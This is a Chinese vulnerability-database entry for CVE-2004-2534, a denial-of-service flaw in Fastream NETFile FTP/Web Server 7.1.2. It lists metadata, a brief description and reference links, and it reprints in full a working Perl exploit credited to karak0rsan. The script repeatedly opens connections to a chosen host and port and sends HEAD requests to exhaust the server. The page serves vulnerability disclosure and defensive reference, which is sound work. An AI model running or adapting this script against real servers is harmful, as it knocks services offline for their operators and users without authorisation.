Fastream NetFile FTP/Web服务器头请求服务拒绝漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109076 漏洞类型 授权问题
发布时间 2005-09-16 更新时间 2006-01-24
CVE编号 CVE-2004-2534 CNNVD-ID CNNVD-200412-847
漏洞平台 Windows CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/1220
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-847
|漏洞详情
FastreamNETFile服务器7.1.2不能正确处理保持激活连接超时的情况并且不能在头请求后关闭连接。远程攻击者通过发送大量HTTP头请求导致服务拒绝(连接消耗)。
|漏洞EXP
#Fastream NETFile FTP/Web Server 7.1.2 Professional DoS Exploit
#Bug found by bratax ck
#Coded bY karak0rsan
#d0gma.org // unuver.com
#Greetz:hurby,phalaposher,l4m3r,Atak,spymaster,razor...

$host=$ARGV[0];
$port=$ARGV[1];

if(!$ARGV[1]){
       print "Fastream FTP/Web Server DoS\n";
       print "Coded by karak0rsan // unuver.com\n";
       print "Usage:perl $0 [target] [port]\n";
}

use IO::Socket;
$socket = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, ) or die "Couldn't Connect!\n";;
close($socket);
if($socket){
       print "\n";
       print "[+]Attacking..!\n";
       }

for($i= 0; $i < 100; $i++)
{
$socket1 = new IO::Socket::INET( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Type => SOCK_STREAM, );
print $socket1 "HEAD / HTTP/1.0\r\n\r\n";
close($socket1);
}
print "Attack finished ;)\n";
exit();

#EoF

# milw0rm.com [2005-09-16]
|参考资料

来源:SECUNIA
名称:13268
链接:http://secunia.com/advisories/13268
来源:XF
名称:fastream-head-request-dos(18192)
链接:http://xforce.iss.net/xforce/xfdb/18192
来源:BID
名称:11687
链接:http://www.securityfocus.com/bid/11687
来源:OSVDB
名称:12101
链接:http://www.osvdb.org/12101
来源:users.pandora.be
链接:http://users.pandora.be/bratax/advisories/b003.html
来源:SECTRACK
名称:1012267
链接:http://securitytracker.com/id?1012267